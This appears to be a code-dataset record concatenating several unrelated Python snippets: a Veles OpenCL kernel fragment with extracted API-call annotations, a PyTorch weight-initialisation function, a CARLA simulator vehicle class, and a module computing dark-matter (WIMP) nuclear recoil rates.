self.np_zero, unpack_data, offsetB=output_offs)
self.krn_pack_.set_arg(0, unpack_data)
self._const_i[0] = start_image * self.output.sample_size
self.krn_pack_.set_arg(2, self._const_i)
limit = unpack_side * self._kernel_size
self.execute_kernel(self._global_size_pack(limit),
self._local_size_pack, self.krn_pack_)
def numpy_run(self):
raise NotImplementedError()
|
[
"numpy.ceil",
"veles.ocl_blas.OCLBLAS.attach_to_device",
"zope.interface.implementer",
"numpy.zeros",
"numpy.ones",
"veles.compat.from_none",
"veles.memory.Array",
"numpy.prod"
] |
[((1689, 1736), 'zope.interface.implementer', 'implementer', (['IOpenCLUnit', 'ICUDAUnit', 'INumpyUnit'], {}), '(IOpenCLUnit, ICUDAUnit, INumpyUnit)\n', (1700, 1736), False, 'from zope.interface import implementer\n'), ((3993, 4000), 'veles.memory.Array', 'Array', ([], {}), '()\n', (3998, 4000), False, 'from veles.memory import Array\n'), ((8909, 8941), 'numpy.ones', 'numpy.ones', (['(1)'], {'dtype': 'self._dtype'}), '(1, dtype=self._dtype)\n', (8919, 8941), False, 'import numpy\n'), ((8965, 8998), 'numpy.zeros', 'numpy.zeros', (['(1)'], {'dtype': 'self._dtype'}), '(1, dtype=self._dtype)\n', (8976, 8998), False, 'import numpy\n'), ((9023, 9056), 'numpy.zeros', 'numpy.zeros', (['(1)'], {'dtype': 'numpy.int64'}), '(1, dtype=numpy.int64)\n', (9034, 9056), False, 'import numpy\n'), ((9090, 9136), 'veles.ocl_blas.OCLBLAS.attach_to_device', 'ocl_blas.OCLBLAS.attach_to_device', (['self.device'], {}), '(self.device)\n', (9123, 9136), True, 'import veles.ocl_blas as ocl_blas\n'), ((6436, 6480), 'numpy.zeros', 'numpy.zeros', (['output_shape'], {'dtype': 'self._dtype'}), '(output_shape, dtype=self._dtype)\n', (6447, 6480), False, 'import numpy\n'), ((7091, 7135), 'numpy.zeros', 'numpy.zeros', (['output_shape'], {'dtype': 'numpy.int32'}), '(output_shape, dtype=numpy.int32)\n', (7102, 7135), False, 'import numpy\n'), ((5687, 5699), 'veles.compat.from_none', 'from_none', (['e'], {}), '(e)\n', (5696, 5699), False, 'from veles.compat import from_none\n'), ((7192, 7216), 'numpy.prod', 'numpy.prod', (['output_shape'], {}), '(output_shape)\n', (7202, 7216), False, 'import numpy\n'), ((10234, 10263), 'numpy.ceil', 'numpy.ceil', (['(size / block_size)'], {}), '(size / block_size)\n', (10244, 10263), False, 'import numpy\n'), ((10484, 10525), 'numpy.ceil', 'numpy.ceil', (['(self.output.size / block_size)'], {}), '(self.output.size / block_size)\n', (10494, 10525), False, 'import numpy\n')]
|
# @Author: <NAME> <narsi>
# @Date: 2018-11-12T14:06:36-06:00
# @Last modified by: narsi
# @Last modified time: 2019-01-27T20:55:47-06:00
import numpy as np
import torch
import torch.nn as nn
import torch.nn.init as init
'''
https://gist.github.com/jeasinema/ed9236ce743c8efaf30fa2ff732749f5
'''
def weight_init(m):
'''
Usage:
model = Model()
model.apply(weight_init)
'''
if isinstance(m, nn.Conv1d):
init.normal(m.weight.data)
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.Conv2d):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.Conv3d):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.ConvTranspose1d):
init.normal(m.weight.data)
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.ConvTranspose2d):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.ConvTranspose3d):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.normal(m.bias.data)
except:
pass
elif isinstance(m, nn.BatchNorm1d):
init.constant_(m.weight.data, 1)
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.BatchNorm2d):
try:
init.constant_(m.weight.data, 1)
except:
pass
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.BatchNorm3d):
init.constant_(m.weight.data, 1)
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.Linear):
init.xavier_uniform_(m.weight.data , gain=np.sqrt(2))
try:
init.constant_(m.bias.data, 0)
except:
pass
elif isinstance(m, nn.LSTM):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal(param.data)
else:
init.normal(param.data)
elif isinstance(m, nn.LSTMCell):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal(param.data)
else:
init.normal(param.data)
elif isinstance(m, nn.GRU):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal(param.data)
else:
init.normal(param.data)
elif isinstance(m, nn.GRUCell):
for param in m.parameters():
if len(param.shape) >= 2:
init.orthogonal(param.data)
else:
init.normal(param.data)
if __name__ == '__main__':
pass
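# A minimal usage sketch (hypothetical model, not part of the original gist):
# weight_init is applied recursively to every submodule via Module.apply.
# model = nn.Sequential(nn.Conv2d(3, 16, 3), nn.BatchNorm2d(16), nn.ReLU())
# model.apply(weight_init)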
|
[
"torch.nn.init.normal",
"torch.nn.init.constant_",
"torch.nn.init.orthogonal",
"numpy.sqrt"
] |
[((445, 471), 'torch.nn.init.normal', 'init.normal', (['m.weight.data'], {}), '(m.weight.data)\n', (456, 471), True, 'import torch.nn.init as init\n'), ((497, 521), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (508, 521), True, 'import torch.nn.init as init\n'), ((677, 707), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (691, 707), True, 'import torch.nn.init as init\n'), ((640, 650), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (647, 650), True, 'import numpy as np\n'), ((863, 887), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (874, 887), True, 'import torch.nn.init as init\n'), ((973, 999), 'torch.nn.init.normal', 'init.normal', (['m.weight.data'], {}), '(m.weight.data)\n', (984, 999), True, 'import torch.nn.init as init\n'), ((826, 836), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (833, 836), True, 'import numpy as np\n'), ((1025, 1049), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (1036, 1049), True, 'import torch.nn.init as init\n'), ((1214, 1238), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (1225, 1238), True, 'import torch.nn.init as init\n'), ((1177, 1187), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (1184, 1187), True, 'import numpy as np\n'), ((1403, 1427), 'torch.nn.init.normal', 'init.normal', (['m.bias.data'], {}), '(m.bias.data)\n', (1414, 1427), True, 'import torch.nn.init as init\n'), ((1509, 1541), 'torch.nn.init.constant_', 'init.constant_', (['m.weight.data', '(1)'], {}), '(m.weight.data, 1)\n', (1523, 1541), True, 'import torch.nn.init as init\n'), ((1366, 1376), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (1373, 1376), True, 'import numpy as np\n'), ((1567, 1597), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (1581, 1597), True, 'import torch.nn.init as init\n'), ((1696, 1728), 'torch.nn.init.constant_', 'init.constant_', (['m.weight.data', '(1)'], {}), '(m.weight.data, 1)\n', (1710, 1728), True, 'import torch.nn.init as init\n'), ((1787, 1817), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (1801, 1817), True, 'import torch.nn.init as init\n'), ((1899, 1931), 'torch.nn.init.constant_', 'init.constant_', (['m.weight.data', '(1)'], {}), '(m.weight.data, 1)\n', (1913, 1931), True, 'import torch.nn.init as init\n'), ((1957, 1987), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (1971, 1987), True, 'import torch.nn.init as init\n'), ((2143, 2173), 'torch.nn.init.constant_', 'init.constant_', (['m.bias.data', '(0)'], {}), '(m.bias.data, 0)\n', (2157, 2173), True, 'import torch.nn.init as init\n'), ((2106, 2116), 'numpy.sqrt', 'np.sqrt', (['(2)'], {}), '(2)\n', (2113, 2116), True, 'import numpy as np\n'), ((2331, 2358), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2346, 2358), True, 'import torch.nn.init as init\n'), ((2393, 2416), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (2404, 2416), True, 'import torch.nn.init as init\n'), ((2545, 2572), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2560, 2572), True, 'import torch.nn.init as init\n'), ((2607, 2630), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (2618, 2630), True, 'import torch.nn.init as init\n'), ((2754, 
2781), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2769, 2781), True, 'import torch.nn.init as init\n'), ((2816, 2839), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (2827, 2839), True, 'import torch.nn.init as init\n'), ((2967, 2994), 'torch.nn.init.orthogonal', 'init.orthogonal', (['param.data'], {}), '(param.data)\n', (2982, 2994), True, 'import torch.nn.init as init\n'), ((3029, 3052), 'torch.nn.init.normal', 'init.normal', (['param.data'], {}), '(param.data)\n', (3040, 3052), True, 'import torch.nn.init as init\n')]
|
import carla
from __init__ import client, world
from TB_common_functions import wraptopi, calculateDistance, AgentColourToRGB
from path_planner_suite import astar_search, find_nearest
from shapely.geometry import LineString
import math
import numpy as np
import matplotlib.pyplot as plt
class vehicle_manual():
def __init__(self):
self.client = client
self.world = world
self.blueprint_library = self.world.get_blueprint_library()
self.vehicle_blueprint = self.blueprint_library.filter("vehicle.mercedes-benz.coupe")[0]
self.vehicle_blueprint.set_attribute('color', AgentColourToRGB("yellow"))
def spawn(self,x,y,z,yaw):
self.actor_list = []
self.spawn_orientation = yaw
self.transform = carla.Transform(carla.Location(x=float(x), y=float(y), z=float(z)), carla.Rotation(yaw=float(self.spawn_orientation)))
self.agent = self.world.spawn_actor(self.vehicle_blueprint, self.transform)
self.world.tick() # important to tick after spawning, otherwise actor details not reachable
self.actor_list.append(self.agent)
self.spawn_point_x = x
self.spawn_point_y = y
self.spawn_point_z = z
self.spawn_point_yaw = yaw
self.agentID = self.agent.id
self.agentType = self.agent.type_id
pass
def step(self):
pass
def Update_state_info(self):
agent_transform = self.agent.get_transform()
agent_location = agent_transform.location
agent_rotation = agent_transform.rotation
agent_velocity = self.agent.get_velocity() # This is an object vector
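        # NOTE: self.world_snapshot is assumed to be set elsewhere (e.g. stored
        # from world.get_snapshot() after a tick by the caller); it is never
        # assigned inside this class.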
self.current_t = self.world_snapshot.timestamp.elapsed_seconds #ts.elapsed_seconds - start_of_simulation_timestamp
self.current_x = agent_location.x
self.current_y = agent_location.y
self.current_z = agent_location.z
self.current_yaw = wraptopi(math.radians(agent_rotation.yaw))
self.current_velocity = np.array([agent_velocity.x, agent_velocity.y, agent_velocity.z]) # This is an array as opposed to agent_velocity, which is an object
self.current_speed = np.sqrt(self.current_velocity.dot(self.current_velocity))
def get_pos(self):
self.Update_state_info()
self.pos_array = [self.current_x, self.current_y, self.current_z, self.current_yaw]
return self.pos_array
def destroy(self):
self.agent.destroy()
pass
def send_control(self, throttle, steer, brake, hand_brake=False, reverse=False):
self.control = carla.VehicleControl()
# Clamp all values within their limits
steer = np.fmax(np.fmin(steer, 1.0), -1.0)
        throttle = np.fmax(np.fmin(throttle, 1.0), 0.0)
        brake = np.fmax(np.fmin(brake, 1.0), 0.0)
self.control.steer = steer
self.control.throttle = throttle
self.control.brake = brake
self.control.hand_brake = hand_brake
self.control.reverse = reverse
self.agent.apply_control(self.control)
|
[
"numpy.fmin",
"TB_common_functions.AgentColourToRGB",
"math.radians",
"numpy.array",
"carla.VehicleControl"
] |
[((2012, 2076), 'numpy.array', 'np.array', (['[agent_velocity.x, agent_velocity.y, agent_velocity.z]'], {}), '([agent_velocity.x, agent_velocity.y, agent_velocity.z])\n', (2020, 2076), True, 'import numpy as np\n'), ((2556, 2578), 'carla.VehicleControl', 'carla.VehicleControl', ([], {}), '()\n', (2576, 2578), False, 'import carla\n'), ((581, 607), 'TB_common_functions.AgentColourToRGB', 'AgentColourToRGB', (['"""yellow"""'], {}), "('yellow')\n", (597, 607), False, 'from TB_common_functions import wraptopi, calculateDistance, AgentColourToRGB\n'), ((1937, 1969), 'math.radians', 'math.radians', (['agent_rotation.yaw'], {}), '(agent_rotation.yaw)\n', (1949, 1969), False, 'import math\n'), ((2658, 2677), 'numpy.fmin', 'np.fmin', (['steer', '(1.0)'], {}), '(steer, 1.0)\n', (2665, 2677), True, 'import numpy as np\n'), ((2722, 2744), 'numpy.fmin', 'np.fmin', (['throttle', '(1.0)'], {}), '(throttle, 1.0)\n', (2729, 2744), True, 'import numpy as np\n'), ((2789, 2808), 'numpy.fmin', 'np.fmin', (['brake', '(1.0)'], {}), '(brake, 1.0)\n', (2796, 2808), True, 'import numpy as np\n')]
|
#===============================WIMPFuncs.py===================================#
# Created by <NAME> 2020
# Contains all the functions for doing the WIMPy calculations
#==============================================================================#
import numpy as np
from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace
from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid
from numpy import nan, isnan, column_stack, amin, amax
from numpy.linalg import norm
from scipy.special import erf
from scipy.spatial import ConvexHull
import LabFuncs
import Params
from Params import m_p_keV, c_km, seconds2year, m_p_kg, GeV_2_kg, c_cm, Jan1
#==============================================================================#
#-------------------- Energy-Time dependent recoil rate------------------------#
#---------------------------------- v_min -------------------------------------#
def MinimumWIMPSpeed(E_r,A,m_chi,delta=0):
# E_r = recoil energy in keVr
# A = nucleus mass number
# m_chi = Wimp mass in GeV
# delta = for inelastic scattering
mu_p = 1.0e6*m_chi*m_p_keV/(1.0e6*m_chi + m_p_keV) # reduced proton mass
m_N_keV = A*m_p_keV # nucleus mass in keV
mu_N_keV = 1.0e6*m_chi*m_N_keV/(1.0e6*m_chi + m_N_keV) # reduced nucleus mass
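    # Kinematic threshold: v_min = (m_N*E_r/mu_N + delta)/sqrt(2*m_N*E_r),
    # converted to km/s by the factor c_km.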
v_min = sqrt(1.0/(2*m_N_keV*E_r))*(m_N_keV*E_r/mu_N_keV + delta)*c_km
return v_min
#---------------------------------- E_max -------------------------------------#
def MaxWIMPEnergy(A,m_chi,\
v_lab=LabFuncs.LabVelocitySimple(67.0),v_esc=Params.SHM.EscapeSpeed):
# A = nucleus mass number
# v_lab = Lab velocity in km/s
# m_chi = Wimp mass in GeV
# v_esc = Escape speed in km/s
m_N = m_p_keV*A
mu_N = 1.0e6*m_N*m_chi/(1.0e6*m_chi+m_N)
E_max_lim = 2.0*mu_N*mu_N*2.0*((v_esc+sqrt(sum(v_lab**2.0)))/c_km)**2.0/m_N
return E_max_lim
#----------------------General event rate -------------------------------------#
def R_wimp(E_th,E_max,m_chi,sigma_p=1.0e-45,\
Nuc=Params.Ar40,Loc=Params.GranSasso,\
HaloModel=Params.SHM,eff_on=False,eres_on=False):
nfine = 1000
Efine = logspace(-3.0,log10(200.0),nfine)
DM = Params.WIMP(m_chi,sigma_p)
# Calculate rate at day=67 to get ~average
dR = dRdE_wimp(Efine,array([(Jan1+67.0)]),DM,HaloModel,Nuc,Loc)
# Correct for efficiency
if eff_on:
dR *= LabFuncs.efficiency(Nuc,Efine)
# Smear by energy resolution
# if eres_on:
# dR = SmearE(Efine,dR,energyresolution(Nuc,Efine))
# Window
mask = (Efine<E_max)&(Efine>E_th)
R = trapz(dR[mask],Efine[mask])
return R
#-------------------- Energy dependent recoil rate-----------------------------#
def dRdE_wimp(E_r,t,DM,\
HaloModel=Params.SHM,Nuc=Params.Ar40,Loc=Params.GranSasso):
# relevant constants
A = Nuc.MassNumber # mass number of nucleus
m_chi = DM.Mass
mu_p = 1.0e6*m_chi*m_p_keV/(1.0e6*m_chi + m_p_keV)
sigma_p = DM.SICrossSection
v_0 = sqrt(2.0)*HaloModel.Dispersion
v_esc = HaloModel.EscapeSpeed
rho_0 = HaloModel.Density
N_esc = HaloModel.Normalisation
FF = LabFuncs.FormFactorHelm(E_r,A)**2.0
v_min = MinimumWIMPSpeed(E_r,A,m_chi)
R0 = (c_cm*c_cm)*((rho_0*1.0e6*A*A*sigma_p)/(2*m_chi*GeV_2_kg*mu_p*mu_p))
# init
ne = size(E_r)
nt = size(t)
dR = zeros(shape=ne)
gvmin = zeros(ne)
# Mean inverse speed
x = v_min/v_0
z = v_esc/v_0
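    # Truncated-Maxwellian mean inverse speed, written in the scaled variables
    # x = v_min/v_0, y = v_e/v_0, z = v_esc/v_0:
    #   g1 applies for x < |y - z| with z < y,
    #   g2 for x < |y - z| with z > y,
    #   g3 for |y - z| < x < y + z,
    # and the rate vanishes for x > y + z.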
if t[0] == t[-1]:
v_e = norm(LabFuncs.LabVelocity(t[0], Loc, HaloModel.RotationSpeed))
y = v_e/v_0
gvmin[(x<abs(y-z))&(z<y)] = (1.0/(v_0*y))
else:
v_e = zeros(shape=ne)
for i in range(0,nt):
v_e[i] = norm(LabFuncs.LabVelocity(t[i], Loc, HaloModel.RotationSpeed))
y = v_e/v_0
g1 = (1.0/(v_0*y))
gvmin[(x<abs(y-z))&(z<y)] = g1[(x<abs(y-z))&(z<y)]
g2 = (1.0/(2.0*N_esc*v_0*y))*(erf(x+y)-erf(x-y)-(4.0/sqrt(pi))*y*exp(-z**2))
g3 = (1.0/(2.0*N_esc*v_0*y))*(erf(z)-erf(x-y)-(2.0/sqrt(pi))*(y+z-x)*exp(-z**2))
gvmin[(x<abs(y-z))&(z>y)] = g2[(x<abs(y-z))&(z>y)]
gvmin[(abs(y-z)<x)&(x<(y+z))] = g3[(abs(y-z)<x)&(x<(y+z))]
gvmin[(y+z)<x] = 0.0
gvmin = gvmin/(1000.0*100.0) # convert to cm^-1 s
# Compute rate = (Rate amplitude * gmin * form factor)
dR = R0*gvmin*FF
dR = dR*seconds2year*1000.0 # convert to per ton-year
return dR
#-------------------- Direction dependent recoil rate--------------------------#
def dRdEdO_wimp(E,t,DM,HaloModel=Params.SHM,Nuc=Params.Ar40,\
Loc=Params.GranSasso,CygnusTracking=False):
E_r = sqrt(E[:,0]**2 + E[:,1]**2 + E[:,2]**2) # Recoil energy
x = zeros(shape=shape(E))
x[:,0] = E[:,0]/E_r # Recoil direction
x[:,1] = E[:,1]/E_r
x[:,2] = E[:,2]/E_r
# relevant constants
A = Nuc.MassNumber # mass number of nucleus
m_chi = DM.Mass
mu_p = 1.0e6*m_chi*m_p_keV/(1.0e6*m_chi + m_p_keV)
sigma_p = DM.SICrossSection
sig_v = HaloModel.Dispersion
v_esc = HaloModel.EscapeSpeed
rho_0 = HaloModel.Density
N_esc = HaloModel.Normalisation
FF = LabFuncs.FormFactorHelm(E_r,A)**2.0
v_min = MinimumWIMPSpeed(E_r,A,m_chi)
R0 = (c_cm*c_cm)*((rho_0*1.0e6*A*A*sigma_p)/(4*pi*m_chi*GeV_2_kg*mu_p*mu_p))
# Calculate v_lab
ne = size(E_r)
nt = size(t)
dR = zeros(shape=(size(E_r)))
v_lab = zeros(shape=(size(E_r),3))
for i in range(0,nt):
v_lab[i,:] = LabFuncs.LabVelocity(t[i], Loc, HaloModel.RotationSpeed)
# Just put vlab towards north pole for cygnus tracking experiment:
if CygnusTracking==True:
for i in range(0,nt):
v_lab[i,:] = array([0.0,0.0,sqrt(sum(v_lab[i,:]**2.0))])
# recoil projection
vlabdotq = (x[:,0]*v_lab[:,0]+x[:,1]*v_lab[:,1]+x[:,2]*v_lab[:,2])
# Radon transform
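    # fhat is the (truncated) Radon transform of the Maxwellian: a 1-D Gaussian
    # in (v_min + vlabdotq) minus the constant escape-speed term, and zero
    # wherever v_min + vlabdotq exceeds v_esc.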
fhat = zeros(shape=shape(E_r))
fhat[((v_min+vlabdotq)<(v_esc))] = (1/(N_esc*sqrt(2*pi*sig_v**2.0)))\
*(exp(-(v_min[((v_min+vlabdotq)<(v_esc))]\
+vlabdotq[((v_min+vlabdotq)<(v_esc))])\
**2.0/(2*sig_v**2.0))\
-exp(-v_esc**2.0/(2*sig_v**2.0)))
fhat = fhat/(1000.0*100.0) # convert to cm^-1 s
# Compute rate = (Rate amplitude * radon trans. * form factor)
dR = R0*fhat*FF # correct for form factor
dR = dR*seconds2year*1000.0 # convert to per ton-year
return dR
#------------ 1-dimensional direction dependent recoil rate--------------------#
def dRdEdcosth_wimp(m_chi,t1,costh_vals,E_r_vals,\
Nuc=Params.Ar40,\
Loc=Params.GranSasso,\
sigma_p=1.0e-45,\
HaloModel=Params.SHM,\
np=20,\
CygnusTracking=False,\
ndims=2,
HT=False):
DM = Params.WIMP(m_chi,sigma_p)
ph = linspace(-pi, pi-(2*pi/(1.0*np)), np)
E1 = zeros(shape=(np,3))
E2 = zeros(shape=(np,3))
if ndims==1:
n = size(costh_vals)
dR = zeros(shape=(n))
for i in range(0,n):
costh = costh_vals[i]
E_r = E_r_vals[i]
E1[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0)
E1[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0)
E1[:,2] = E_r*costh
E2[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0)
E2[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0)
E2[:,2] = -1.0*E_r*costh
dR[i] = trapz(dRdEdO_wimp(E1,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking)\
+dRdEdO_wimp(E2,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking),ph)
elif ndims==2:
# 2D
ne = size(E_r_vals)
nc = size(costh_vals)
dR = zeros(shape=(nc,ne))
for i in range(0,nc):
costh = costh_vals[i]
for j in range(0,ne):
E_r = E_r_vals[j]
E1[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0)
E1[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0)
E1[:,2] = E_r*costh
dR[i,j] = trapz(dRdEdO_wimp(E1,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking))
if HT==False:
for i in range(0,nc):
costh = costh_vals[i]
for j in range(0,ne):
E_r = E_r_vals[j]
E2[:,0] = E_r*cos(ph)*sqrt(1-costh**2.0)
E2[:,1] = E_r*sin(ph)*sqrt(1-costh**2.0)
E2[:,2] = -1.0*E_r*costh
dR[i,j] += trapz(dRdEdO_wimp(E2,t1*ones(shape=np),DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking))
return dR
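# --- illustrative calls, not part of the original file, showing the two ndims modes ---
# ndims=1 pairs costh_vals[i] with E_r_vals[i]; ndims=2 evaluates the full (costh, E_r) grid
dR_pairs = dRdEdcosth_wimp(100.0, 67.0, linspace(0.1,1.0,10), linspace(5.0,50.0,10), ndims=1)
dR_grid = dRdEdcosth_wimp(100.0, 67.0, linspace(0.0,1.0,11), linspace(5.0,50.0,21), ndims=2)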
def R_Ecosth_wimp(m_chi,t1,A_CR,E_min,E_max=200.0,ne=50,nc=50,\
Nuc=Params.Ar40,\
Loc=Params.GranSasso,\
sigma_p=1.0e-45,\
HaloModel=Params.SHM,\
np=20,\
CygnusTracking=False,
HT=False):
E_r_edges = linspace(E_min,E_max,ne+1)
costh_edges = linspace(0.0,1.0,nc+1)
E_r_centers = (E_r_edges[1:]+E_r_edges[0:-1])/2.0
costh_centers = (costh_edges[1:]+costh_edges[0:-1])/2.0
dR = dRdEdcosth_wimp(m_chi,t1,costh_edges,E_r_edges,Nuc=Nuc,\
CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=2,HaloModel=HaloModel,HT=HT)
[X,Y] = meshgrid(E_r_edges,costh_edges)
dX = X[1:,1:]-X[1:,0:-1]
dY = Y[1:,1:]-Y[0:-1,1:]
    # 2D trapezoidal rule: each bin integral ~ (dX*dY/4) * (sum of its four corner values)
    R = 0.5*0.5*dX*dY*(dR[1:,1:]+dR[1:,0:-1]+dR[0:-1,1:]+dR[0:-1,0:-1])
return E_r_centers,costh_centers,R
def R_Ecosth2_wimp(m_chi,t1,A_CR,E_min,E_max=200.0,ne=50,\
Nuc=Params.Ar40,\
Loc=Params.GranSasso,\
sigma_p=1.0e-45,\
HaloModel=Params.SHM,\
np=20,\
CygnusTracking=False):
nc_fine = 300
E_r_edges = linspace(E_min,E_max,ne+1)
S_edges = linspace(0.0,1.0,ne+1)
costh_edges = linspace(0.0,1.0,nc_fine+1)
costh_centers = (costh_edges[1:]+costh_edges[0:-1])/2.0
E_r_centers = (E_r_edges[1:]+E_r_edges[0:-1])/2.0
S_centers = (S_edges[1:]+S_edges[0:-1])/2.0
dE = E_r_edges[1]-E_r_edges[0]
R = zeros(shape=(ne,ne))
# dRf1 = dRdEdcosth_wimp(m_chi,t1,costh_edges,E_r_edges[0]*ones(shape=nc_fine+1),Nuc=Nuc,\
# CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=1)
# for i in range(0,ne):
# dRf2 = dRdEdcosth_wimp(m_chi,t1,costh_edges,E_r_edges[i+1]*ones(shape=nc_fine+1),Nuc=Nuc,\
# CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=1)
# for k in range(0,ne):
# dcosth = sqrt(S_edges[i+1]/A_CR)-sqrt(S_edges[i]/A_CR)
# mask = (costh_edges<sqrt(S_edges[k+1]/A_CR))*(costh_edges>sqrt(S_edges[k]/A_CR))
# R[k,i] = 0.5*dE*(trapz(dRf1[mask],costh_edges[mask])\
# +trapz(dRf2[mask],costh_edges[mask]))
# dRf1 = 1.0*dRf2
for i in range(0,ne):
if S_edges[i]<=A_CR:
for j in range(0,ne):
efine = linspace(E_r_edges[j],E_r_edges[j+1],5)
smin = S_edges[i]
smax = min(S_edges[i+1],A_CR)
cfine = linspace(sqrt(smin/A_CR),sqrt(smax/A_CR),5)
R[i,j] = trapz(trapz(dRdEdcosth_wimp(m_chi,t1,cfine,efine,Nuc=Nuc,HaloModel=HaloModel,\
CygnusTracking=CygnusTracking,sigma_p=sigma_p,np=np,ndims=2),cfine),efine)
return E_r_centers,S_centers,R
def R_IS_wimp(m_chi,t1,A_CR,E_min,E_max=200.0,ne=20,\
Nuc=Params.Ar40,\
Loc=Params.GranSasso,\
sigma_p=1.0e-45,\
HaloModel=Params.SHM,\
np=20,\
CygnusTracking=False):
E_o_edges = linspace(E_min,E_max,ne+1)
E_o_centers = (E_o_edges[1:]+E_o_edges[0:-1])/2.0
[I,S] = meshgrid(E_o_edges,E_o_edges)
C = sqrt((1.0/A_CR)*1.0/(I/S+1))
E = S+I
dR = zeros(shape=shape(C))
for i in range(0,ne+1):
mask = (C[i,:]<=1)&(E[i,:]<E_max)
costh_vals = C[i,mask]
E_r_vals = E[i,mask]
dR[i,mask] = dRdEdcosth_wimp(m_chi,t1,costh_vals,E_r_vals,Nuc=Nuc,\
CygnusTracking=CygnusTracking,\
sigma_p=sigma_p,\
np=np,ndims=1,HaloModel=HaloModel)
R = zeros(shape=(ne,ne))
for i in range(0,ne):
for j in range(0,ne):
x = array([E[i,j],E[i,j+1],E[i+1,j],E[i+1,j+1],
E[i,j],E[i,j+1],E[i+1,j],E[i+1,j+1]])
y = array([C[i,j],C[i,j+1],C[i+1,j],C[i+1,j+1],
C[i,j],C[i,j+1],C[i+1,j],C[i+1,j+1]])
z = array([0,0,0,0,
dR[i,j],dR[i,j+1],dR[i+1,j],dR[i+1,j+1]])
if any(z>0):
points = column_stack((x,y,z))
R[i,j] = ConvexHull(points,qhull_options='W1e-15 E1e-15').volume
return E_o_centers,R
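# --- illustrative check of the convex-hull integration above, not part of the original file ---
# For a cell whose four corners share the same rate the hull is a box, so its volume
# reduces to (cell area)*(rate), which is what each R[i,j] approximates bin by bin.
pts = column_stack((array([0.,1.,0.,1.,0.,1.,0.,1.]),    # E corners (base and top)
                    array([0.,0.,1.,1.,0.,0.,1.,1.]),    # costh corners (base and top)
                    array([0.,0.,0.,0.,2.,2.,2.,2.])))  # rate: 0 on the base, 2 on the top
print(ConvexHull(pts).volume)                          # 2.0 = (1 x 1 cell) * height 2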
# def R_Ecosth2_wimp_alt(m_chi,t1,A_CR,E_min,E_max=200.0,ne=50,\
# Nuc=Params.Ar40,\
# Loc=Params.GranSasso,\
# sigma_p=1.0e-45,\
# HaloModel=Params.SHM,\
# nside=8,\
# CygnusTracking=False):
# DM = Params.WIMP(m_chi,sigma_p)
# E_r_edges = linspace(E_min,E_max,ne+1)
# S_edges = linspace(0.0,1.0,ne+1)
# E_r_centers = (E_r_edges[1:]+E_r_edges[0:-1])/2.0
# S_centers = (S_edges[1:]+S_edges[0:-1])/2.0
# # Healpix discretisation of a sphere
# npix = 12*nside**2
# dpix = 4*pi/(npix*1.0)
# x_pix = zeros(shape=(npix,3))
# for i in range(0,npix):
# x_pix[i,:] = hp.pix2vec(nside, i)
# t1 = t1*ones(shape=npix)
# costh = x_pix[:,2]
# dE = E_r_edges[1]-E_r_edges[0]
# R = zeros(shape=(ne,ne))
# dRf1 = dpix*dRdEdO_wimp(E_r_edges[0]*x_pix,t1,DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking)
# for i in range(0,ne):
# dRf2 = dpix*dRdEdO_wimp(E_r_edges[i]*x_pix,t1,DM,HaloModel,Nuc,Loc,CygnusTracking=CygnusTracking)
